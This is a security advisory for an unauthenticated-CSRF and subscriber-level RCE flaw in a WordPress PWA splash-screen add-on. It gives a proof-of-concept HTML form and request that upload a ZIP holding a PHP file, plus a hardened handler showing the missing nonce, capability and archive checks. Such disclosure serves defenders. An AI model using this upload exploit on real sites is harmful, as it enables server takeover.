When the Apple Touch Icons & Splash Screen add-on is active, its superpwa_splashscreen_uploader AJAX action does not properly check for CSRF, authorisation, or the content of the uploaded archive file. This allows attackers to upload an archive containing a PHP file, leading to RCE either from a low-privilege account (subscriber and above) or via a CSRF attack against any logged-in user. Version 2.1.11 fixed only the CSRF check; v2.1.12 added the capability check.
Log in to the blog as a low-privilege user (such as a subscriber), save the HTML below to a file (replacing example.com with the blog's actual domain), open it in the same browser session used to log in, and select a ZIP archive containing a PHP file:

```html
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
Zipped PHP File <input type="file" name="file"/><br/><br/>
<input type="submit" value="Upload"/>
</form>
</body>
</html>
```

The resulting request (the binary archive body is not reproduced here):

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42382098251599243971534803211
Content-Length: 595
Connection: close
Cookie: [low privilege cookies]
Upgrade-Insecure-Requests: 1

-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------42382098251599243971534803211
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

[binary contents of 134.zip, containing 134-zipped.php]
-----------------------------42382098251599243971534803211--
```

The extracted PHP file will then be reachable at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php
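For comparison, the following is an added, illustrative hardened handler for the same AJAX action showing the three controls the advisory says were missing (nonce, capability, archive content validation). It is not the plugin's code; the nonce action name, the `manage_options` capability and the allowed-extension list are assumptions of this example.

```php
<?php
// Illustrative hardened handler for the superpwa_splashscreen_uploader AJAX
// action. Not the plugin's own code; the nonce action name, capability and
// allowed-extension list are assumptions of this example.
add_action( 'wp_ajax_superpwa_splashscreen_uploader', 'example_splashscreen_upload' );

function example_splashscreen_upload() {
    // 1. CSRF: require a nonce issued to this user for this action, so a form on
    //    a third-party page cannot drive the upload with the victim's cookies.
    check_ajax_referer( 'superpwa_splashscreen_upload', 'nonce' ); // nonce name assumed
    // 2. Authorisation: only administrators may change splash screens; this is
    //    what keeps a subscriber account away from the upload entirely.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    if ( empty( $_FILES['file']['tmp_name'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( 'no file uploaded', 400 );
    }
    // 3. Archive contents: inspect every entry name BEFORE extracting anything.
    $allowed = array( 'png' => true, 'jpg' => true, 'jpeg' => true );
    $zip     = new ZipArchive();
    if ( $zip->open( $_FILES['file']['tmp_name'] ) !== true ) {
        wp_send_json_error( 'not a valid zip archive', 400 );
    }
    $names = array();
    for ( $i = 0; $i < $zip->numFiles; $i++ ) {
        $name = $zip->getNameIndex( $i );
        $ext  = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
        // Reject nested paths / traversal ("../x.png", "dir/") and any non-image
        // extension (.php, .phtml, .htaccess, ...), which is the RCE vector here.
        if ( $name !== basename( $name ) || ! isset( $allowed[ $ext ] ) ) {
            $zip->close();
            wp_send_json_error( 'disallowed archive entry: ' . $name, 400 );
        }
        $names[] = $name;
    }
    $dest = trailingslashit( wp_upload_dir()['basedir'] ) . 'superpwa-splashIcons/';
    wp_mkdir_p( $dest );
    $zip->extractTo( $dest );
    $zip->close();

    // 4. Defence in depth: remove any extracted entry that is not real image
    //    data, so a script merely renamed to .png does not stay in uploads.
    foreach ( $names as $name ) {
        if ( @getimagesize( $dest . $name ) === false ) {
            unlink( $dest . $name );
        }
    }
    wp_send_json_success( 'splash icons uploaded' );
}
```

The matching form must send the nonce (for example from `wp_create_nonce( 'superpwa_splashscreen_upload' )`) in a `nonce` field, otherwise `check_ajax_referer` terminates the request.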
UPLOAD
2021-06-29